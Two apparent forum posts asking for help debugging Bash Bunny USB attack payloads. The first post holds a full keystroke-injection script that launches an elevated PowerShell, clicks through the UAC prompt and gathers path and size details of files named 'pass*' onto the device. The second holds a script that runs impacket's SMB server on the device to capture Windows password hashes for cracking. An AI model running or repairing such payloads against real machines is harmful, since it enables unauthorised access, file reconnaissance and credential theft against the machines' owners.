A_SarcasticGuy

So, I decided to try and write a script that can be used for recon, to find files with a specific phrase within their name and exfil the full path, file name and file size to the Bunny, however when I try to run the script, it doesn't even create the directory to store the file in and for some reason the LED blinks green... #!/bin/bash #Title: FileInfoExfiltrator #Author: A_SarcasticGuy #Version: 1.0 #Target: Windows #Runs Powershell as Admin then scans (default "c:\") for all files beginning with a #specific phrase (default "pass*") and dumps the #full and relative paths and file size to a text file. LED B #Create dump directory LOOTDIR=/loot/exfil mkdir -p $LOOTDIR LED R #Source bunny_helpers.sh to source SWITCH_POSITION source bunny_helpers.sh ATTACKMODE HID STORAGE LED G #Launch Powershell as Admin Q GUI r Q DELAY 100 Q STRING powershell Start-Process powershell -Verb RunAs Q ENTER #Bypass UAC Q DELAY 500 Q ALT y Q ENTER Q DELAY 500 LED B #Start p.bat Q STRING ".((gwmi win32_volume -f 'label='BashBunny''').Name+'payloads/' Q STRING $SWITCH_POSITION Q STRING '/p.bat')" Q ENTER #Wait for p.bat to finish LED R G B Q DELAY 3000 Q STRING exit Q ENTER sync LED G The p.bat file works perfectly fine (or at least from what I an tell by testing it manually), it is just confusing as to why the LED is blinking green (I really have made sure that I have the right switch selected). Any ideas?

Hello there! I was trying to combine the smbserver.py script from impacket and a ducky script to connect to the smb server automatically (the same script as is used for the rubber ducky apart from it connects to the IP of the Bunny) and pipe the result from the script to a file, which means the windows hashes will be saved in that file and saved to the Bunny, ready for cracking (I think?). However, whenever I try to run it, the Bunny seems to get caught up after running the server and I am assuming this is because the keyboard is still captured by the server, and if I were to add a: QUACK CTRL C after the server has run, it will stop the server (I assume). I used the following code to make sure that it wasn't an issue with my ducky script or anything else in the bunny script: #Run SMB Server and then connect to it in windows with the terminal output saved to a .txt LED B #HID is used to ensure that the ducky script can run (even though only a delay is included here) ATTACKMODE HID RNDIS_ETHERNET source bunny_helpers.sh #File path of the script, piping to file O.txt of same folder /pentest/impacket/examples/smbserver.py tmp /tmp/ >> O.txt #Potential QUACK CTRL C, if it doesn't stop the server QUACK DELAY 500 #Check to make sure that the script continues after running the server LED R #The keyword parsed is always included at the start of the server, which would allow a check to be performed to ensure that the server is #running if grep parsed O.txt then LED R G B else LED R fi And the LED always remains blue, which assured me that it was getting caught at the running of the server. I even added a DELAY 500 to make sure it wasn't just that the grep was being performed before the file was populated. So, I was wondering if anyone has any idea of how to fix this issue? Whether it be use another script that will free the keyboard after running or use a stager payload of some sorts? Or maybe I am just being quite naive and missing something obvious! Any help would be greatly appreciated! Yours Sincerely.